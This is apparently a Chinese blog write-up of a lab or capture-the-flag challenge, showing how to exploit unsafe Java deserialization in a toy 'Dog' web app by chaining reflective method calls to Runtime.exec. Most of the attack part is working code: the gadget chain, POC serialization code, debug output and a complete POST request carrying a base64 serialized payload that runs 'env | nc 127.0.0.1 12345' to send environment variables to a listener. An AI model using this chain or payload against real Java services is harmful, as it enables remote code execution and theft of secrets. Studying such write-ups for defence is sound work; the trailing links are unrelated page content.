第二十三章 幻境迷心·皇陨星沉(大结局)

最新推荐文章于 2025-11-25 22:13:12 发布
原创 最新推荐文章于 2025-11-25 22:13:12 发布 · 284 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #web安全

关键函数

Dog类:

public int hashCode() {
        System.out.println("hashCode"+"    "+this.object.getClass()+"          "+this.methodName);
        this.wagTail(this.object, this.methodName, this.paramTypes, this.args);
        return Objects.hash(new Object[]{this.id});
    }
    
default Object wagTail(Object input, String methodName, Class[] paramTypes, Object[] args) {
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(methodName, paramTypes);
            return method.invoke(input, args);
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }

DogService类:

public Object chainWagTail() {
        Object input = null;

        for(Dog dog : this.dogs.values()) {
            if (input == null) {
                input = dog.object;
            }

            Object result = dog.wagTail(input, dog.methodName, dog.paramTypes, dog.args);
            input = result;
        }
        return input;
    }
    
public void importDogsBase64(String base64Data) {
        try (ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64Data))) {
            ObjectInputStream ois = new ObjectInputStream(bais);
            Throwable var5 = null;

            try {
                for(Dog dog : (Collection)ois.readObject()) {
                    dog.setId(this.nextId++);
                    this.dogs.put(dog.getId(), dog);
                }
            } catch (Throwable var32) {
                var5 = var32;
                throw var32;
            } finally {
                if (ois != null) {
                    if (var5 != null) {
                        try {
                            ois.close();
                        } catch (Throwable var31) {
                            var5.addSuppressed(var31);
                        }
                    } else {
                        ois.close();
                    }
                }
            }
        } catch (ClassNotFoundException | IOException e) {
            ((Exception)e).printStackTrace();
        }
    }

DogController类:

@PostMapping({"/import"})
    public String importDogs(@RequestParam("data") String base64Data) {
        this.dogService.importDogsBase64(base64Data);
        return "导入成功!";
    }

链子:

实际运行链:DogController.importDogs() => ois.readObject() => Dog.hashCode() => DogService.chainWagTail() => Dog.wagTail() => Dog.wagTail() => Dog.wagTail() => Dog.wagTail() => Dog.wagTail()

其中四次wagTail为chainWagTail的内部循环,也就是dog.wagTail(input, dog.methodName, dog.paramTypes, dog.args);的输出值为下一个的输入值(此处需利用反射)

所以我们这里想到一段非常经典的代码(好吧,也可以从CC1链的角度考虑)

T(String).getClass().forName("java.lang.Runtime").getMethod("exec",T(String[])).invoke(T(String).getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(T(String).getClass().forName("java.lang.Runtime")),new String[]{"/bin/bash","-c","xxx"})

即

Class.forName("java.lang.Runtime").getMethod("exec",new Class[]{String.class}).invoke(
	Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(
		Class.forName("java.lang.Runtime")
	),
	new String[]{"/bin/bash","-c","xxx"}
	)
	
//Class.forName()根据类的完全限定名(字符串)动态加载并返回Class对象;object.getClass()返回对象的运行时类型的Class对象;而.class不需要实例,可以直接用,比如Runtime.class、Object.class

所以我们利用该函数来实现以上代码

for(Dog dog : this.dogs.values()) {
            if (input == null) {
                input = dog.object;
            }

            Object result = dog.wagTail(input, dog.methodName, dog.paramTypes, dog.args);
            input = result;
        }
        
即

for(Dog dog : this.dogs.values()) {
            if (input == null) {
                input = dog.object;
            }
            Object result = input.getClass().getMethod(dog.methodName, dog.paramTypes).invoke(input, dog.args);
            input = result;
        }

所以执行顺序须为:
result = Class.class.forName("java.lang.Runtime");//得到java.lang.Runtime的Class对象 

result = Runtime.class.getMethod("getRuntime", new Class[0]);//获取Runtime类的getRuntime静态方法对象

result = java.lang.reflect.Method.invoke(null, new Object[0]);//获取Runtime对象(由于是静态方法调用,invoke不需要实例对象)

result = Runtime.getRuntime().exec(new String[]{"sh", "-c", "env | nc 127.0.0.1 12345"}});//最终达到命令执行的效果

在执行过程中调试打印结果:

Input is not an instance of Dog. Class: java.lang.Class
result       java.lang.Class
getMethod1
Input is not an instance of Dog. Class: java.lang.Class
result       java.lang.reflect.Method
invoke1
Input is not an instance of Dog. Class: java.lang.reflect.Method
result       java.lang.Runtime
exec1
Input is not an instance of Dog. Class: java.lang.Runtime
result       java.lang.UNIXProcess

从上面的执行链编写POC链:先序列化4条dog,然后通过DogService.importDogsBase64() 存入

  dog.object=Class.class;
  dog.methodName= "forName";
  dog.paramTypes=new Class[]{String.class};
  dog.args=new Object[]{"java.lang.Runtime"};

  dog1.object=null;
  dog1.methodName= "getMethod";
  dog1.paramTypes=new Class[]{String.class, Class[].class};
  dog1.args=new Object[]{"getRuntime", new Class[0]};

  dog2.object=null;
  dog2.methodName= "invoke";
  dog2.paramTypes=new Class[]{Object.class, Object[].class};
  dog2.args=new Object[]{null, new Object[0]};

  dog3.object=null;
  dog3.methodName= "exec";
  dog3.paramTypes=new Class[]{ String[].class};
  dog3.args= new Object[]{ new String[]{"sh", "-c", "env | nc 127.0.0.1 12345"}};

写触发hashcode的类,仿照URLDNS那条链子

		Dog dog4= new Dog(1,"1","1",1);
		dog4.object=null;
    	dog4.methodName= "chainWagTail";
    	dog4.paramTypes=new Class[]{};
    	dog4.args  =new Object[]{};
    	
        dog4.equals(this.dogService);
        HashMap ht = new HashMap();
        ht.put(dog4,'1');
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(btout);
        objOut.writeObject(ht);
        String encodedBytes4 = base64Encode(btout.toByteArray());
        System.out.println("dog4: " + encodedBytes4);

序列化dog4时,我由于在DogController类下做序列化(应该在其他类也可以),因为不能新new一个DogService类,Dog中object等类为包级访问权限,在其他包做序列化时,需注意改一下Dog的equals函数,在第一行加入this.object = o;

serialVersionUID 是用于在序列化和反序列化过程中进行核验的一个版本号,基于以下结构信息计算:

  1. 类名
  2. 类修饰符
  3. 实现的接口(按字母顺序)
  4. 字段(名称、类型、修饰符)
  5. 构造器签名(参数类型、修饰符)
  6. 方法签名(方法名、参数类型、返回类型、修饰符)

所以函数方法体内容变更,并不会影响serialVersionUID,仍可正常用于序列化

最后的dog4会包括前面所执行的所有步骤,所以在真实环境只用上传dog4的序列化内容即可。最终Payload,监听本地12345端口即可

POST /dogs/import?data=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGGNvbS5leGFtcGxlLmRlbW8uRG9nLkRvZ/exKIUKvpXqAgAJSQADYWdlSQAGaHVuZ2VySQACaWRbAARhcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wABWJyZWVkdAASTGphdmEvbGFuZy9TdHJpbmc7TAAKbWV0aG9kTmFtZXEAfgAETAAEbmFtZXEAfgAETAAGb2JqZWN0dAASTGphdmEvbGFuZy9PYmplY3Q7WwAKcGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwAAAAAQAAADIAAAABdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAHQAATF0AAxjaGFpbldhZ1RhaWxxAH4ACnNyAB9jb20uZXhhbXBsZS5kZW1vLkRvZy5Eb2dTZXJ2aWNlDbfwhpGRhCMCAAJJAAZuZXh0SWRMAARkb2dzdAAPTGphdmEvdXRpbC9NYXA7eHAAAAAFc3EAfgAAP0AAAAAAAAx3CAAAABAAAAAEc3IAEWphdmEubGFuZy5JbnRlZ2VyEuKgpPeBhzgCAAFJAAV2YWx1ZXhyABBqYXZhLmxhbmcuTnVtYmVyhqyVHQuU4IsCAAB4cAAAAAFzcQB%2bAAIAAAABAAAAMgAAAAF1cQB%2bAAgAAAABdAARamF2YS5sYW5nLlJ1bnRpbWV0AAExdAAHZm9yTmFtZXEAfgAWdnIAD2phdmEubGFuZy5DbGFzcyx%2bVQPZv5VTAgAAeHB1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAF2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHBzcQB%2bABAAAAACc3EAfgACAAAAAQAAADIAAAACdXEAfgAIAAAAAnQACmdldFJ1bnRpbWV1cQB%2bABoAAAAAdAABMXQACWdldE1ldGhvZHEAfgAjcHVxAH4AGgAAAAJxAH4AHXZxAH4AGnNxAH4AEAAAAANzcQB%2bAAIAAAABAAAAMgAAAAN1cQB%2bAAgAAAACcHVxAH4ACAAAAAB0AAExdAAGaW52b2tlcQB%2bACtwdXEAfgAaAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4ACHNxAH4AEAAAAARzcQB%2bAAIAAAABAAAAMgAAAAR1cQB%2bAAgAAAABdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAA3QAAnNodAACLWN0ABhlbnYgfCBuYyAxMjcuMC4wLjEgMTIzNDV0AAExdAAEZXhlY3EAfgA5cHVxAH4AGgAAAAF2cQB%2bADR4dXEAfgAaAAAAAHNyABNqYXZhLmxhbmcuQ2hhcmFjdGVyNItH2WsaJngCAAFDAAV2YWx1ZXhwADF4 HTTP/1.1
Host: 127.0.0.1:53568
Content-Length: 0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Origin: http://127.0.0.1:53568
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:53568/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Lightpig&
关注
第十四届蓝桥杯模拟赛(C++B组)
weixin_62069241的博客
12-22 2176
2022年第十四届蓝桥杯模拟赛(C++B组)
四川省阆中中学高中地理第一章行星地球单元测试题新人教版必修1
08-06
【知识点详解】 1. 地球自转方向:地球自转是围绕地轴自西向东转动,无论在北半球还是南半球都是如此。...以上是针对“四川省阆中中学高中地理第一章行星地球单元测试题新人教版必修1”的详细知识点解析。
《地球概论》(第3版)笔记 第二章 地球的宇宙环境
weixin_43826681的博客
02-12 6269
目录第二章 地球的宇宙环境第三节 恒星和星系201 恒星201-1 恒星及其自行201-2 恒星的发光和光谱201-3 多普勒效应201-4 恒星的亮度和光度 第二章 地球的宇宙环境 第三节 恒星和星系 天体: ① 聚集态:各类星体 ② 弥散态:星云 ③ 星际物质:星际气体、星际尘埃 恒星 星系、银河系、河外星系 201 恒星 201-1 恒星及其自行 恒星的空间速度 = 视向速度 + 切向速度 视向速度:离观察者远去为正,向观察者接近为负 切向速度:表现为恒星在天球上的位移(自行) 201-2 恒星的发
体验 服务器正在维护升级中 给大,4月3日体验服停机更新公告
weixin_42513170的博客
08-03 169
亲爱的召唤师:为了增加版本的稳定性,我们计划在2019年4月3日 12:00-13:00对《王者荣耀》体验服进行停机维护。【更新时间】2019年4月3日 12:00-13:00(11:30关闭PVP)【更新方式】停机更新【更新范围】王者荣耀修炼之地体验服【反馈渠道】如果您更新版本过程中或更新后出现异常或遇到任何BUG,请在修炼之地讨论区进行反馈【下载地址】体验服更新完毕后,您打开王者荣耀-体验服...
合肥工业大学 慕课 梦溪笔谈 习题答案
yue_hhh的博客
11-13 3056
古代,常人对陨星等天文现象都是从( )角度判断 问:古代,常人对陨星等天文现象都是从( )角度判断 答:封建信 “油伞验尸”运用的是 问:“油伞验尸”运用的是( ) 答:光学原理 《梦溪笔谈》大部分的内容是关于 问:3. 《梦溪笔谈》大部分的内容是关于( )的 答:社会科学 《梦溪笔谈》内容深厚广博,包括以下 问:《梦溪笔谈》内容深厚广博,包括以下( ) 答:政治 经济 军事 音乐 哲学 历史 ...
微型计算机中 存储器容量最大的部件是,2012年计算机一级考试B练习题及答案
weixin_34521351的博客
06-17 889
一、选择题1.计算机之所以能按人们的意志自动进行工作,最直接的原因是因为采用了A)二进制数制B)高速电子元件C)存储程序控制D)程序设计语言2.微型计算机主机的主要组成部分是A)运算器和控制器B)CPU和内存储器C)CPU和硬盘存储器D)CPU、内存储器和硬盘3.一个完整的计算机系统应该包括A)主机、键盘和显示器B)硬件系统和软件系统C)主机和它的外部设备D)系统软件和应用软件4.计算机软件系统包...
在微型计算机系统中什么部件存储容量最大,2012年计算机一级考试B练习题及答案...
weixin_42151729的博客
06-16 538
一、选择题1.计算机之所以能按人们的意志自动进行工作,最直接的原因是因为采用了A)二进制数制B)高速电子元件C)存储程序控制D)程序设计语言2.微型计算机主机的主要组成部分是A)运算器和控制器B)CPU和内存储器C)CPU和硬盘存储器D)CPU、内存储器和硬盘3.一个完整的计算机系统应该包括A)主机、键盘和显示器B)硬件系统和软件系统C)主机和它的外部设备D)系统软件和应用软件4.计算机软件系统包...
人有管理地球的责任《基督教与科学》第十七课
林兴陆
04-17 721
黄牧师一、神的创造诗8:1-91.地球的确是个非常精密调治的环境,只有这样才适合高等生物生存。2.在这浩瀚的宇宙中,地球看起来好像一粒微尘,微不足道,可是从地球特殊的环境...
进一步看地球生物进化的历史《基督教与科学》第十九课
林兴陆
04-19 473
黄牧师创1:20-23地球有45亿年历史,在初期7亿年中强烈陨星陨石的撞击的期间不可能有生命。因为地表不断地被经过高热融化,凝结,高热融化,又凝结的过程。直到38亿年前大...
《大众天文学》介绍了地球、月亮、太阳、行星世界、彗星、流星及陨星、恒星宇宙以及天文仪器等
08-05 1399
《大众天文学》是由法国天文学家、世界著名科普作家C.弗拉马里翁所著,分别介绍了地球、月亮、太阳、行星世界、彗星、流星及陨星、恒星宇宙以及天文仪器等。
陨星撞击的地学意义与撞击构造的判识标志 (2008年)
05-08
陨星撞击是太阳系各行星及卫星演化、地质历史中导致古气候环境灾变与生物灭绝和新生的主要营力之一,在地球演化早期是一种较为普遍发生的事件。研究陨星撞击作用及其影响是探讨地球演化的有机组成部分,无论在基础...
在anaconda下陨星vitpose
03-17
### 安装和运行 VitPose 的方法 要在 Anaconda 环境下成功安装并运行 VitPose,可以按照以下说明操作: #### 创建 Conda 虚拟环境 首先创建一个新的 Conda 环境来隔离依赖项。这有助于避免与其他项目发生冲突。...
SSM企业物资管理系统h3109(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
2509_93102542的博客
11-21 763
在技术实现上,国外多采用成熟的开发框架和技术架构,注重系统的安全性、稳定性和可扩展性,同时积极融入大数据、人工智能等新技术,实现物资需求预测、智能库存优化等功能。基于此,开发一套基于SSM框架的企业物资管理系统,整合部门、员工、物资及各类业务流程管理功能,实现物资管理的数字化、规范化和高效化,成为解决企业物资管理痛点的必然需求。本课题旨在开发一套基于SSM框架的企业物资管理系统,围绕部门、员工、物资信息、物资申请、消息提醒、物资归还、物资入库、意见反馈八大核功能模块,实现企业物资管理的全流程数字化。
2025最新 SpringCloud 教程,Nacos-总结,笔记19
Rockandrollman的博客
11-25 51
2025最新 SpringCloud 教程,Nacos-总结,笔记19
Java原生网络编程-BIO与NIO
照母山挖洋芋
11-24 458
摘要:本文对比了Java原生JDK中的BIO(阻塞I/O)和NIO(非阻塞I/O)网络编程模型。BIO采用"一连接一线程"模式,存在线程资源浪费和性能瓶颈问题,可通过线程池优化为伪异步I/O模型。NIO通过Selector、Channel和Buffer三大核组件实现非阻塞通信,支持单线程管理多个通道。重点介绍了NIO的Reactor模式、事件类型(OP_READ/OP_WRITE等)及服务端/客户端的不同关注点,展示了NIO相比BIO在高并发场景下的优势。(149字)
spring全局懒加载(default-lazy-init)导致的afterPropertiesSet不执行问题
豆豆的博客
11-21 516
Spring配置default-lazy-init="true"会导致所有Bean延迟初始化,影响afterPropertiesSet方法的执行时机。解决方案包括:1)为关键Bean显式设置lazy-init="false";2)使用@Lazy(false)注解;3)编程式强制初始化;4)使用DependsOn控制顺序。最佳实践建议分层配置策略,核组件立即初始化,业务组件懒加载,并通过配置文件分离和环境区分优化配置。实际应用中,Web应用的请求处理相关Bean和批处
Java集合框架实战:构建高效的企业管理系统
2402_83075343的博客
11-23 954
本文通过两个企业管理系统案例,详细解析了Java集合框架的核应用。员工部门管理系统采用HashMap实现部门与员工的高效映射,具备智能添加、快速查询和动态统计功能;商品库存管理系统基于ArrayList实现精细化管控,包含智能录入、库存预警和价格排序等特性。文章对比了HashMap和ArrayList的特性差异,提供了集合选型的最佳实践,并探讨了系统扩展方向。这两个实战案例展示了集合框架在企业应用中的实际价值,为开发者掌握Java集合提供了实用参考。
Spring Boot 中使用 @Transactional 注解配置事务管理
2509_94007314的博客
11-21 1334
下面分别介绍一下的几个属性。
Fastjson 反序列化漏洞深度解析:从原理到实战防护
最新发布
qq_40448670的博客
11-25 729
作为 Java 生态中最常用的 JSON 解析库之一,Fastjson 因高性能被广泛应用于各类系统。但它的反序列化漏洞(尤其是 CVE-2022-25845)曾多次引发大规模安全事件 —— 攻击者只需构造恶意 JSON 字符串,就能实现远程代码执行(RCE),直接控制服务器。本文将从漏洞原理切入,结合实战案例拆解各版本绕过技巧,最终给出企业级防护方案,帮你彻底规避风险。Fastjson 的反序列化漏洞本质是。该机制原本用于方便还原复杂对象类型,却被攻击者利用来加载恶意类,触发危险操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值